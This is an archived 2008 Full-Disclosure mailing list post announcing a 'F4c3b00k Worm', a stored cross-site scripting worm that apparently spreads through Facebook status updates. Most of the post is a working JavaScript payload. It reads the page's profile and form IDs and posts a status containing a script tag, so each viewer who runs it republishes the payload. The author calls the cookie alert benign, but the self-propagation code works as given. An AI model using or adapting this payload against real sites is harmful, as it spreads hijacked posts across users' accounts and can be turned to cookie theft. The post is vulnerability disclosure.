lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 25 Dec 2008 06:09:17 -0800 From: "Kristian Erik Hermansen" <kristian.hermansen@...il.com> To: full-disclosure@...ts.grok.org.uk Subject: F4c3b00k Worm Seems to be able to spread via automated status messages. When another user sees the hijacked status message, they are likely to execute the status updater payload as well, which then spreads to anyone else who can see those status updates. This document.cookie payload is benign. Emulation is achieved by pasting the payload below into Firefox while on the profile.php page... javascript:var p='profile_id='+document.getElementById('profile_id').value+'&status=<script>alert(document.cookie);</script>'+'&profile=true'+'&test_name=INLINE_STATUS_EDITOR'+'&action=OTHER_UPDATE'+'&post_form_id='+document.getElementById('post_form_id').value;hr=new XMLHttpRequest();hr.overrideMimeType('text/html');hr.open('POST', 'updatestatus.php', true);hr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');hr.setRequestHeader('Content-length', p.length);hr.setRequestHeader('Connection', 'close');hr.send(p); -- Kristian Erik Hermansen Have you tried Session Destroyer yet? <http://kristian.hermansen.googlepages.com/session.destroyer.html> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists